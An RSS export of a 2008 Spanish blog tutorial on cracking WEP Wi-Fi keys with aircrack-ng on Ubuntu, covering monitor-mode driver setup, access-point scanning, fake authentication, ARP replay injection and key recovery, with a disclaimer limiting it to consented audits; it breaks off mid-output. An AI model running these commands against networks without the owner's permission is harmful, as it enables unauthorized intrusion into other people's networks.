<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Vive-libre.com &#187; AUDITORIA</title>
	<atom:link href="http://vive-libre.com/blog/tag/auditoria/feed/" rel="self" type="application/rss+xml" />
	<link>http://vive-libre.com/blog</link>
	<description>Un espacio, para la libertad.</description>
	<lastBuildDate>Thu, 24 Dec 2009 18:25:15 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Adutoria de seguridad wireless con ipw3945 ubuntu y aircrack</title>
		<link>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/</link>
		<comments>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/#comments</comments>
		<pubDate>Thu, 06 Mar 2008 02:38:33 +0000</pubDate>
		<dc:creator>yovany</dc:creator>
				<category><![CDATA[LINUX]]></category>
		<category><![CDATA[SEGURIDAD]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[WIRELESS]]></category>
		<category><![CDATA[AIRCRACK]]></category>
		<category><![CDATA[AUDITORIA]]></category>
		<category><![CDATA[IPW3945]]></category>
		<category><![CDATA[IPWRAW]]></category>
		<category><![CDATA[WEP]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/</guid>
		<description><![CDATA[En vista al interes de  muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.
Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner [...]]]></description>
			<content:encoded><![CDATA[<p>En vista al interes de  muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.</p>
<p>Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.</p>
<p>Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW</p>
<p>Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma</p>
<div class="igBar"><span id="lcode-23"><a href="#" onclick="javascript:showPlainTxt('code-23'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-23">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">$ sudo apt-get install - build-essential</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">$ sudo apt-get install - linux-ubuntu-modules-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-restricted-modules-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-image-debug-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-image-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> linux-headers-$<span style="color:#006600; font-weight:bold;">&#40;</span>uname -r<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.</p>
<p>Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw</p>
<p>descargamos las fuentes</p>
<div class="igBar"><span id="lcode-24"><a href="#" onclick="javascript:showPlainTxt('code-24'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-24">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">wget http:<span style="color:#FF9933; font-style:italic;">//dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2 </span></div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Descomprimimos el paquete,</p>
<div class="igBar"><span id="lcode-25"><a href="#" onclick="javascript:showPlainTxt('code-25'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-25">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">tar -xjf ipwraw-ng-<span style="color:#800000;color:#800000;">2</span>.<span style="color:#800000;color:#800000;">3</span>.<span style="color:#800000;color:#800000;">4</span>-<span style="color:#800000;color:#800000;">04022008</span>.<span style="">tar</span>.<span style="">bz2</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.</p>
<div class="igBar"><span id="lcode-26"><a href="#" onclick="javascript:showPlainTxt('code-26'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-26">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make install</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo make install_ucode </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.</p>
<div class="igBar"><span id="lcode-27"><a href="#" onclick="javascript:showPlainTxt('code-27'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-27">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">echo “blacklist ipwraw” | sudo tee /etc/modprobe.<span style="">d</span>/ipwraw</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo depmod -ae </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw</p>
<div class="igBar"><span id="lcode-28"><a href="#" onclick="javascript:showPlainTxt('code-28'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-28">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe -r ipw3945</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe ipwraw </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para cargar el ipw3945, hacemos lo mismo, pero al contrario.</p>
<div class="igBar"><span id="lcode-29"><a href="#" onclick="javascript:showPlainTxt('code-29'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-29">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe -r ipwraw</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo modprobe ipw3945 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Despues de montar y desmontar los driver's hay que esperar un poco para que se efectuen los cambios.</p>
<p>Para comprobar, que esten funcionando, tecleamos lo siguiente.</p>
<div class="igBar"><span id="lcode-30"><a href="#" onclick="javascript:showPlainTxt('code-30'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-30">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">iwconfig </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y devemos obtener algo como esto.</p>
<div class="igBar"><span id="lcode-31"><a href="#" onclick="javascript:showPlainTxt('code-31'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-31">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">lo&nbsp; &nbsp; &nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">eth0</span>&nbsp; &nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">vmnet1</span>&nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">vmnet8</span>&nbsp; &nbsp; no wireless extensions.</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">eth1</span>&nbsp; &nbsp; &nbsp; unassociated&nbsp; ESSID:off/any</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Mode:Monitor&nbsp; Channel=<span style="color:#800000;color:#800000;">1</span>&nbsp; Bit Rate=<span style="color:#800000;color:#800000;">54</span> Mb/s</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">rtap0&nbsp; &nbsp; &nbsp;no wireless extensions. </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Tal vez puedas obtener wifi0 en lugar de eth1</p>
<p>Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.</p>
<div class="igBar"><span id="lcode-32"><a href="#" onclick="javascript:showPlainTxt('code-32'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-32">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">sudo apt-get install aircrack-ng </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Listo, ahora empezaremos por averiguar cuales son los acces points accesibles</p>
<div class="igBar"><span id="lcode-33"><a href="#" onclick="javascript:showPlainTxt('code-33'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-33">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">airodump-ng rtap0 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y deberiamos obtener algo parecido a esto.</p>
<div class="igBar"><span id="lcode-34"><a href="#" onclick="javascript:showPlainTxt('code-34'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-34">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">CH&nbsp; <span style="color:#800000;color:#800000;">0</span> <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> Elapsed: <span style="color:#800000;color:#800000;">8</span> s <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">2008</span>-<span style="color:#800000;color:#800000;">03</span>-<span style="color:#800000;color:#800000;">05</span> <span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">01</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Beacons&nbsp; &nbsp; #Data, #/s&nbsp; CH&nbsp; MB&nbsp; ENC&nbsp; CIPHER AUTH ESSID</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp; &nbsp; &nbsp;<span style="color:#800000;color:#800000;">86</span>&nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#800000;color:#800000;">9</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">1</span>&nbsp; <span style="color:#800000;color:#800000;">54</span>. <span style="">WEP</span>&nbsp; WEP&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MAGI</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; STATION&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Lost&nbsp; Packets&nbsp; Probes </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Al identificar nustro objetivo debemos ejecutar el siguiente <a href="http://www.vive-libre.com/blog/etc/script.sh">script</a> para poder inyectar trafico.</p>
<p>Veremos algo asi</p>
<div class="igBar"><span id="lcode-35"><a href="#" onclick="javascript:showPlainTxt('code-35'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-35">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el canal para eth1 o wifi0?</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">1</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el rate de captura por defecto debe ser <span style="color:#800000;color:#800000;">2</span>”</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">2</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Indica el bssid objetivo”</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">“Configuracion completada, listo par inyectar” </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Empezamos a capturar los paquetes con el airodump-bg</p>
<div class="igBar"><span id="lcode-36"><a href="#" onclick="javascript:showPlainTxt('code-36'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-36">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">airodump-ng -c CANAL -w FICHERO rtap0 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y deberiamos obteneralgo asi</p>
<div class="igBar"><span id="lcode-37"><a href="#" onclick="javascript:showPlainTxt('code-37'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-37">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">CH&nbsp; <span style="color:#800000;color:#800000;">1</span> <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> BAT: <span style="color:#800000;color:#800000;">1</span> hour <span style="color:#800000;color:#800000;">38</span> mins <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> Elapsed: <span style="color:#800000;color:#800000;">48</span> s <span style="color:#006600; font-weight:bold;">&#93;</span><span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">2008</span>-<span style="color:#800000;color:#800000;">03</span>-<span style="color:#800000;color:#800000;">05</span> <span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">34</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR RXQ&nbsp; Beacons&nbsp; &nbsp; #Data, #/s&nbsp; CH&nbsp; MB&nbsp; ENC&nbsp; CIPHER AUTH ESSID</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">XX:XX:XX:XX:XX:XX&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span> <span style="color:#800000;color:#800000;">100</span>&nbsp; &nbsp; &nbsp; <span style="color:#800000;color:#800000;">467</span>&nbsp; &nbsp; &nbsp; &nbsp;<span style="color:#800000;color:#800000;">47</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">1</span>&nbsp; <span style="color:#800000;color:#800000;">54</span>. <span style="">WEP</span>&nbsp; WEP&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;MAGI</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BSSID&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; STATION&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PWR&nbsp; Lost&nbsp; Packets&nbsp; Probes </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Para poder inyectar necesitamos asociarnos con el acces point.</p>
<div class="igBar"><span id="lcode-38"><a href="#" onclick="javascript:showPlainTxt('code-38'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-38">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aireplay-ng -<span style="color:#800000;color:#800000;">1</span> <span style="color:#800000;color:#800000;">0</span> -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<div class="igBar"><span id="lcode-39"><a href="#" onclick="javascript:showPlainTxt('code-39'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-39">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Waiting for beacon frame <span style="color:#006600; font-weight:bold;">&#40;</span>BSSID: XX:XX:XX:XX:XX:XX<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Sending Authentication Request</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Authentication successful</div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">30</span>&nbsp; Sending Association Request</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">21</span>:<span style="color:#800000;color:#800000;">52</span>:<span style="color:#800000;color:#800000;">32</span>&nbsp; Association successful :-<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan</p>
<div class="igBar"><span id="lcode-40"><a href="#" onclick="javascript:showPlainTxt('code-40'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-40">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aireplay-ng -<span style="color:#800000;color:#800000;">3</span> -b MAC_PUNTODEACCESO -h -h NUESTRAMAC eth1 </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>En unos cuantos segundos podemos ver como genero unos miles de DATA</p>
<div class="igBar"><span id="lcode-41"><a href="#" onclick="javascript:showPlainTxt('code-41'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-41">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Saving ARP requests in replay_arp-<span style="color:#800000;color:#800000;">0305</span>-<span style="color:#800000;color:#800000;">215511</span>.<span style="">cap</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">You should also start airodump-ng to capture replies.</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="">Read</span> <span style="color:#800000;color:#800000;">16339</span> packets <span style="color:#006600; font-weight:bold;">&#40;</span>got <span style="color:#800000;color:#800000;">8045</span> ARP requests<span style="color:#006600; font-weight:bold;">&#41;</span>, sent <span style="color:#800000;color:#800000;">8042</span> packets...<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#800000;color:#800000;">333</span> pps<span style="color:#006600; font-weight:bold;">&#41;</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.</p>
<p>Ahora solo  hay que pasar el fichero por el aircrack</p>
<div class="igBar"><span id="lcode-42"><a href="#" onclick="javascript:showPlainTxt('code-42'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-42">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">aircrack-ng FICHERO.<span style="">cap</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Y listo</p>
<div class="igBar"><span id="lcode-43"><a href="#" onclick="javascript:showPlainTxt('code-43'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-43">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Aircrack-ng <span style="color:#800000;color:#800000;">0</span>.<span style="color:#800000;color:#800000;">9</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#800000;color:#800000;">00</span>:<span style="color:#800000;color:#800000;">00</span>:<span style="color:#800000;color:#800000;">01</span><span style="color:#006600; font-weight:bold;">&#93;</span> Tested <span style="color:#800000;color:#800000;">1</span> keys <span style="color:#006600; font-weight:bold;">&#40;</span>got <span style="color:#800000;color:#800000;">552366</span> IVs<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
